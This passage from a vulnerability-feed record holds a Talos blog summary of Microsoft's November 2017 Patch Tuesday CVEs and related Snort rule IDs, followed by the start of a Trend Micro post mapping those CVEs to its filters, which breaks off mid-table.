id=\"h.zgfs4ty8epb8\">Vulnerabilities Rated Critical</h2><br />The following vulnerabilities are rated \"Critical\" by Microsoft:<br /><br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11836\">CVE-2017-11836 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11837\">CVE-2017-11837 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11838\">CVE-2017-11838 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11839\">CVE-2017-11839 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11840\">CVE-2017-11840 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11841\">CVE-2017-11841 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11843\">CVE-2017-11843 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11845\">CVE-2017-11845 - Microsoft Edge Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11846\">CVE-2017-11846 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11855\">CVE-2017-11855 - Internet Explorer Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11856\">CVE-2017-11856 - Internet Explorer Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11858\">CVE-2017-11858 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11861\">CVE-2017-11861 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11862\">CVE-2017-11862 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11866\">CVE-2017-11866 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11869\">CVE-2017-11869 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11870\">CVE-2017-11870 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11871\">CVE-2017-11871 - Scripting Engine Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11873\">CVE-2017-11873 - Scripting Engine Memory Corruption Vulnerability</a></li></ul><br /><h3 id=\"h.pmrxkbmph7q8\">Multiple CVEs - Scripting Engine Memory Corruption Vulnerability</h3><br />Multiple vulnerabilities have been identified in the scripting engine of Microsoft Edge that could allow an attacker to execute arbitrary code. These vulnerabilities manifest due to Microsoft Edge improperly handling objects in memory. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities. Successful exploitation of these vulnerabilities could allow an attacker to execute code within the context of the current user.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11836</li><li>CVE-2017-11839</li><li>CVE-2017-11840</li><li>CVE-2017-11841</li><li>CVE-2017-11861</li><li>CVE-2017-11862</li><li>CVE-2017-11866</li><li>CVE-2017-11870</li><li>CVE-2017-11871</li><li>CVE-2017-11873</li></ul><h3 id=\"h.9bhb21vu9pw3\">Multiple CVEs - Scripting Engine Memory Corruption Vulnerability</h3><br />Multiple remote code execution vulnerabilities have been identified affecting the scripting engine in Microsoft browsers. These vulnerabilities manifest due to the scripting engine improperly handling objects in memory. Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code within the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked \"safe for initialization.\"<br /><br />The following is a list of CVEs related to these vulnerabilities.<br /><ul><li>CVE-2017-11837 </li><li>CVE-2017-11838</li><li>CVE-2017-11843</li><li>CVE-2017-11846</li><li>CVE-2017-11858 </li></ul><h3 id=\"h.l4j3cblo56e5\">CVE-2017-11845 - Microsoft Edge Memory Corruption Vulnerability</h3><br />A remote code vulnerability has been identified that affects Microsoft Edge. The vulnerability is related to the way Microsoft Edge accesses objects in memory. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with the same access rights as the current user. Scenarios where this vulnerability would likely be exploited include web-based attacks where a user navigates to a malicious webpage designed to exploit this vulnerability, or via the use of a malicious email attachment that the user is convinced to open. <br /><br /><h3 id=\"h.kwuhvlxn2rdl\">Multiple CVEs - Internet Explorer Memory Corruption Vulnerability</h3><br />Two remote code vulnerabilities have been discovered that affect Internet Explorer. These vulnerabilities are related to the way Internet Explorer accesses objects in memory. Successful exploitation of these vulnerabilities could result in the execution of arbitrary code with the same access rights as the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where a user navigates to a malicious webpage designed to exploit this vulnerability, or via the use of a malicious email attachment that the user is convinced to open.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11855</li><li>CVE-2017-11856 </li></ul><h3 id=\"h.25ulimn27xx4\">CVE-2017-11869 - Scripting Engine Memory Corruption Vulnerability</h3><br />A vulnerability has been identified in the scripting engine of Internet Explorer that could allow an attacker to execute arbitrary code. These vulnerability manifest due to Internet Explorer improperly accessing objects in memory. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities. Successful exploitation of these vulnerabilities could allow an attacker to execute code within the context of the current user.<br /><br /><h2 id=\"h.ftn8wufn5bzc\">Vulnerabilities Rated Important</h2><br />The following vulnerabilities are rated \"Important\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11768\">CVE-2017-11768 - Windows Media Player Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11770\">CVE-2017-11770 - ASP.NET Core Denial Of Service Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11788\">CVE-2017-11788 - Windows Search Denial of Service Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11791\">CVE-2017-11791 - Scripting Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11803\">CVE-2017-11803 - Microsoft Edge Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11827\">CVE-2017-11827 - Microsoft Browser Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11830\">CVE-2017-11830 - Device Guard Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11831\">CVE-2017-11831 - Windows Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11832\">CVE-2017-11832 - Windows EOT Font Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11833\">CVE-2017-11833 - Microsoft Edge Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11834\">CVE-2017-11834 - Scripting Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11835\">CVE-2017-11835 - Windows EOT Font Engine Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11842\">CVE-2017-11842 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11844\">CVE-2017-11844 - Microsoft Edge Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11847\">CVE-2017-11847 - Windows Kernel Elevation of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11849\">CVE-2017-11849 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11850\">CVE-2017-11850 - Microsoft Graphics Component Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11851\">CVE-2017-11851 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11852\">CVE-2017-11852 - Windows GDI Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11853\">CVE-2017-11853 - Windows Kernel Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11854\">CVE-2017-11854 - Microsoft Word Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11863\">CVE-2017-11863 - Microsoft Edge Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11872\">CVE-2017-11872 - Microsoft Edge Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11874\">CVE-2017-11874 - Microsoft Edge Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11877\">CVE-2017-11877 - Microsoft Excel Security Feature Bypass Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11878\">CVE-2017-11878 - Microsoft Excel Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11879\">CVE-2017-11879 - ASP.NET Core Elevation Of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11880\">CVE-2017-11880 - Windows Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">CVE-2017-11882 - Microsoft Office Memory Corruption Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11884\">CVE-2017-11884 - Microsoft Office Memory Corruption Vulnerability</a></li></ul><h3 id=\"h.bdoa4s47wkbw\">CVE-2017-11768 - Windows Media Player Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Windows Media Player. This vulnerability manifests due to Windows Media Player improperly disclosing file information. In order to exploit this vulnerability an attacker would need to authenticate to an affected system and execute a program designed to exploit this vulnerability. Successful exploitation of this vulnerability would allow an attacker to enumerate the existence of files stored on an affected system.<br /><br /><h3 id=\"h.q5rd6srfdkn8\">Multiple CVEs - ASP.NET Core Denial Of Service Vulnerability</h3><br />Multiple denial of service vulnerabilities have been identified that affect ASP.NET Core. These vulnerabilities manifest due to .NET Core improperly handling web requests. These vulnerabilities could be exploited remotely by an unauthenticated attacker. Successful exploitation could result in a denial of service condition. <br /><br />The following CVEs are related to these vulnerabilities:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11770\">CVE-2017-11770 - ASP.NET Core Denial Of Service Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11883\">CVE-2017-11883 - ASP.NET Core Denial Of Service Vulnerability</a></li></ul><h3 id=\"h.38zj0t9asa7l\">CVE-2017-11788 - Windows Search Denial of Service Vulnerability</h3><br />A denial of service vulnerability has been identified that affects Windows Search. This vulnerability manifests due to Windows Search improperly handling objects in memory. This vulnerability could be exploited by sending specially crafted messages to the Windows Search service. Additionally this vulnerability could be exploited by an unauthenticated remote attacker via Server Message Block (SMB). Successful exploitation of this vulnerability could result in a denial of service condition on affected systems.<br /><br /><h3 id=\"h.n7xhfhgh78f0\">CVE-2017-11791 - Scripting Engine Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Microsoft browsers. This vulnerability manifests due to Microsoft browsers improperly handling objects in memory. This vulnerability could be leveraged by an attacker to obtain information that could be used for subsequent attacks against an affected system. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of this vulnerability.<br /><br /><h3 id=\"h.su1nmhb9yrz2\">Multiple CVEs - Microsoft Edge Information Disclosure Vulnerability</h3><br />Two information disclosure vulnerabilities have been identified that affect Microsoft Edge. These vulnerabilities manifest due to Microsoft Edge improperly handling objects in memory. These vulnerabilities could be leveraged by an attacker to obtain information that could be used for subsequent attacks against an affected system. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of this vulnerability.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11803</li><li>CVE-2017-11844</li></ul><h3 id=\"h.eak31u2c41u2\">CVE-2017-11827 - Microsoft Browser Memory Corruption Vulnerability</h3><br />A remote code execution vulnerability has been identified that affects Microsoft browsers. This vulnerability manifests due to the way in which Microsoft browsers access objects in memory. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with the same privileges as the current user. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of this vulnerability or convincing a user to open a malicious email attachment.<br /><br /><h3 id=\"h.fn76sfmfrnf3\">CVE-2017-11830 - Device Guard Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified that affects Device Guard. This vulnerability manifests due to the way in which Device Guard incorrectly validates untrusted files. Successful exploitation of this vulnerability could allow an attacker to make an unsigned file appear as if it is signed, allowing an attacker to execute malicious files on affected systems.<br /><br /><h3 id=\"h.y3wb9e2yktsf\">Multiple CVEs - Windows Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified that affect the Windows kernel. These vulnerabilities manifest due to the Windows kernel failing to properly initialize memory addresses. These vulnerabilities could be leveraged by an attacker to obtain information that could be used for subsequent attacks against an affected system. Exploiting these vulnerabilities would require an attacker to authenticate to an affected device and execute an application designed to exploit this vulnerability.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11831</li><li>CVE-2017-11880</li></ul><h3 id=\"h.btsw9vna5f30\">Multiple CVEs - Windows EOT Font Engine Information Disclosure Vulnerability</h3><br />Two information disclosure vulnerabilities have been identified that affect Microsoft Windows Embedded OpenType (EOT). These vulnerabilities manifest due to the way in which the font engine parses embedded fonts. Successful exploitation of these vulnerabilities could allow an attacker to obtain information that could be used for subsequent attacks against an affected system. <br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11832</li><li>CVE-2017-11835</li></ul><h3 id=\"h.hzfeoreuofyd\">CVE-2017-11833 - Microsoft Edge Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Microsoft Edge. This vulnerability manifests due to the way in which Microsoft Edge handles cross-origin requests. This vulnerability could be leveraged by an attacker to determine the origin of webpages within an affected browser. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of this vulnerability. <br /><br /><h3 id=\"h.3e1zkv9m7hzg\">CVE-2017-11834 - Scripting Engine Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability was identified that affects Internet Explorer. This vulnerability manifests due to the scripting engine in Internet Explorer not properly handling objects in memory. This vulnerability could be leveraged by an attacker to obtain information that could be used in additional attacks. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of this vulnerability. <br /><br /><h3 id=\"h.yv8u67oyrby6\">Multiple CVEs - Windows Kernel Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities were identified that affect the Windows Kernel-Mode Drivers. These vulnerabilities manifest due to the Windows Kernel failing to properly initialize memory addresses. These vulnerabilities could be leveraged by an attacker to obtain information that could be used in subsequent attacks to further compromise an affected system. Exploitation of these vulnerabilities would require an attacker to log in and execute a program specifically designed to exploit them.<br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11842</li><li>CVE-2017-11849</li><li>CVE-2017-11853</li></ul><h3 id=\"h.ispynop4ff07\">CVE-2017-11847 - Windows Kernel Elevation of Privilege Vulnerability</h3><br />A privilege escalation vulnerability has been identified that affects the Windows Kernel. This vulnerability manifests due to the Windows Kernel failing to properly handle objects in memory. Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability and could allow an attacker to run arbitrary code in kernel memory.<br /><br /><h3 id=\"h.596vig5drvj1\">CVE-2017-11850 - Microsoft Graphics Component Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects the Microsoft Graphics Component. This vulnerability manifests due to the Windows GDI component disclosing kernel memory addresses. An attacker could leverage this vulnerability to obtain information that could be used for additional attacks against an affected system. Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability.<br /><br /><h3 id=\"h.t8ap458u96px\">CVE-2017-11851 - Windows Kernel Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects the Microsoft Graphics Component. This vulnerability manifests due to the Windows GDI component disclosing kernel memory addresses. An attacker could leverage this vulnerability to obtain information that could be used for additional attacks against an affected system. Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability.<br /><br /><h3 id=\"h.kti9vg98v2si\">CVE-2017-11852 - Windows GDI Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects the Microsoft Graphics Component. This vulnerability manifests due to the Windows GDI component disclosing kernel memory addresses. An attacker could leverage this vulnerability to obtain information that could be used for additional attacks against an affected system. Successful exploitation of this vulnerability would require an attacker to log on to a system and execute a program specifically designed to exploit this vulnerability.<br /><br /><h3 id=\"h.btbv13lo447t\">CVE-2017-11854 - Microsoft Word Memory Corruption Vulnerability</h3><br />A remote code execution vulnerability has been identified that affects Microsoft Office. This vulnerability manifests due to Microsoft Office improperly handling objects in memory. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code within the context of the current user. In order to exploit this vulnerability, an attacker would need to create a specially crafted file and convince a user to open it within an affected version of Microsoft Office.<br /><br /><h3 id=\"h.vfhxvo8e1vuz\">CVE-2017-11863 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A security feature bypass has been identified in Microsoft Edge that could allow an attacker to load a page containing malicious content without the user's knowledge or consent. This vulnerability manifests in the Edge Content Security Policy where certain specially crafted documents are improperly validated. An attacker could exploit this vulnerability by convincing a user to navigate to a malicious page or by injecting malicious content into page, such as an advertisement, thereby bypassing the Content Security Policy.<br /><br /><h3 id=\"h.9suck7nnkgfu\">CVE-2017-11872 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified in Microsoft Edge that could allow an attacker to bypass Cross-Origin Resource Sharing restrictions. This vulnerability manifests as a result of Edge improperly handling redirect requests and following redirect requests that should otherwise be ignored. An attacker could exploit this vulnerability by creating a specially crafted web page designed to exploit this vulnerability and convincing a user to visit the web page. Attackers could also leverage vulnerable or compromised web pages exploit this vulnerability.<br /><br /><h3 id=\"h.9qx8ma9p7xwo\">CVE-2017-11874 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified in Microsoft Edge that could allow an attacker to bypass the Control Flow Guard. This vulnerability manifests as a result of the Edge Just-In-Time compiler incorrectly handling memory operations in compiled code. An attacker could exploit this vulnerability by creating a specially crafted web page designed to exploit this vulnerability and convincing a user to visit the web page.<br /><br /><h3 id=\"h.p53pt1akjudq\">CVE-2017-11877 - Microsoft Excel Security Feature Bypass Vulnerability</h3><br />A security feature bypass vulnerability has been identified that affects Microsoft Office. The vulnerability is related to Microsoft Office failing to enforce macro settings on Excel documents. Exploitation of this vulnerability does not result in code execution and requires an attacker to create a specially crafted file that is opened in an affected version of Microsoft Excel.<br /><br /><h3 id=\"h.recfefvinm40\">CVE-2017-11878 - Microsoft Excel Memory Corruption Vulnerability</h3><br />A remote code execution vulnerability has been identified that affects Microsoft Office. The vulnerability is related to Microsoft Office not properly handling objects in memory. Successful exploitation of this vulnerability could result in an attacker gaining the ability to execute arbitrary code within the context of the current user. Exploitation of this vulnerability requires an attacker to create a specially crafted file that is opened in an affected version of Microsoft Office. <br /><br /><h3 id=\"h.hyk2905styk6\">CVE-2017-11879 - ASP.NET Core Elevation Of Privilege Vulnerability</h3><br />An open redirect vulnerability has been identified at affects ASP.NET Core. Exploitation of this vulnerability could result in privilege escalation. In order to exploit this vulnerability an attacker would need to create a specially crafted URL which could be used to redirect the victim's browser session to a malicious site and obtain login session information.<br /><br /><h3 id=\"h.6020jwogk4nx\">Multiple CVEs - Microsoft Office Memory Corruption Vulnerability</h3><br />Multiple remote code execution vulnerabilities have been identified that affect Microsoft Office. These vulnerabilities are related to Microsoft Office not properly handling objects in memory. Successful exploitation of these vulnerabilities could result in an attacker gaining the ability to execute arbitrary code within the context of the current user. Exploitation of this vulnerability requires an attacker to create a specially crafted file that is opened in an affected version of Microsoft Office. <br /><br />The following is a list of CVEs related to these vulnerabilities:<br /><ul><li>CVE-2017-11882</li><li>CVE-2017-11884</li></ul><br /><h2 id=\"h.9bugt6nqiqht\">Vulnerabilities Rated Moderate</h2><br />The following vulnerabilities are rated \"Moderate\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11848\">CVE-2017-11848 - Internet Explorer Information Disclosure Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11876\">CVE-2017-11876 - Microsoft Project Server Elevation of Privilege Vulnerability</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8700\">CVE-2017-8700 - ASP.NET Core Information Disclosure Vulnerability</a></li></ul><h3 id=\"h.wfk7ipeakm4m\">CVE-2017-11848 - Internet Explorer Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects Internet Explorer. This vulnerability manifests due to the way in which Internet Explorer handles page contents. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of this vulnerability. Successful exploitation of this vulnerability could allow an attacker to detect navigation of a user leaving a malicious web page. <br /><br /><h3 id=\"h.1fxj2jwk3xet\">CVE-2017-11876 - Microsoft Project Server Elevation of Privilege Vulnerability</h3><br />A privilege escalation vulnerability has been discovered affecting Microsoft Project. It is related to the way in which Microsoft Project Server improperly manages user sessions. The victim must be logged in to the target site in order for this vulnerability to be exploited. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of this vulnerability. Successful exploitation of this vulnerability could allow an attacker to access content that the attacker is not authorized to access or impersonate the user within the web application. It could also enable the attacker to inject malicious contents into the victim's browser.<br /><br /><h3 id=\"h.wd4h9qqis9cx\">CVE-2017-8700 - ASP.NET Core Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified that affects ASP.net Core. This vulnerability could enable an attacker to bypass Cross-Origin Resource Sharing (CORS) configurations. Successful exploitation of this vulnerability could allow an attacker to access content that they are not authorized to access from within a web application.<br /><br /><h2 id=\"h.bipt9xzi68fa\">Coverage</h2><br />In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.<br /><br />Snort Rules:<br /><ul><li>43120-43121</li><li>44809-44834</li><li>44838-44839</li><li>44843-44846</li></ul>For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal:<a href=\"http://www.talosintelligence.com/vulnerability-reports/\"> </a><a href=\"http://www.talosintelligence.com/vulnerability-reports/\">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br /><a href=\"http://www.talosintelligence.com/vulnerability-reports/\"></a><br /><br />To review our Vulnerability Disclosure Policy, please visit this site:<br /><br /><a href=\"http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html\">http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html</a><br /><br /><a href=\"http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html\"></a><br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=gKTSu-yN4pM:3HD9OhLzN18:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/gKTSu-yN4pM\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-11-14T19:54:05", "published": "2017-11-14T11:54:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/gKTSu-yN4pM/ms-tuesday.html", "id": "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "type": "talosblog", "title": "Microsoft Patch Tuesday - November 2017", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-11-26T20:03:00", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11768", "CVE-2017-11770", "CVE-2017-11788", "CVE-2017-11791", "CVE-2017-11803", "CVE-2017-11827", "CVE-2017-11830", "CVE-2017-11831", "CVE-2017-11832", "CVE-2017-11833", "CVE-2017-11834", "CVE-2017-11835", "CVE-2017-11836", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11839", "CVE-2017-11840", "CVE-2017-11841", "CVE-2017-11842", "CVE-2017-11843", "CVE-2017-11844", "CVE-2017-11845", "CVE-2017-11846", "CVE-2017-11847", "CVE-2017-11848", "CVE-2017-11849", "CVE-2017-11850", "CVE-2017-11851", "CVE-2017-11852", "CVE-2017-11853", "CVE-2017-11854", "CVE-2017-11855", "CVE-2017-11856", "CVE-2017-11858", "CVE-2017-11861", "CVE-2017-11862", "CVE-2017-11863", "CVE-2017-11866", "CVE-2017-11867", "CVE-2017-11869", "CVE-2017-11870", "CVE-2017-11871", "CVE-2017-11872", "CVE-2017-11873", "CVE-2017-11874", "CVE-2017-11876", "CVE-2017-11877", "CVE-2017-11878", "CVE-2017-11879", "CVE-2017-11880", "CVE-2017-11882", "CVE-2017-11883", "CVE-2017-8700"], "description": "\n\nThe dreaded white, blank screen in Microsoft Word is taunting me, with its blinking cursor asking for words to be written. Just when I thought I wouldn\u2019t get any inspiration for this week\u2019s blog, inspiration came to me from beyond through our late CTO Raimund Genes. Earlier this week, the third annual Trend Micro Capture the Flag (CTF), now known as the Raimund Genes Cup, competition was held in Tokyo, giving IT and security professionals the opportunity to expand their skill sets. A total of 10 teams participated in multiple challenges in categories including targeted attacks, Internet of Things (IoT), Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA). Team Egrf33ks won this year\u2019s competition and now qualifies for HITCON 2017. For the full results of this year\u2019s CTF, click [here](<https://www.trendmicro.com/en_us/campaigns/capture-the-flag.html>).\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before November 14, 2017. It was another big month with 53 security patches covering Internet Explorer (IE), Microsoft Edge, Microsoft Windows, Microsoft Office, ASP.NET Core and .NET Core, and Chakra Core. 20 of the patches are listed as Critical and 31 are rated Important. Six of the Microsoft CVEs came through the Zero Day Initiative program. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [November 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/11/14/the-november-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-11768 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11770 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11788 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11791 | 29921 | \nCVE-2017-11803 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11827 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11830 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11831 | | Vendor Deemed Reproducibility or 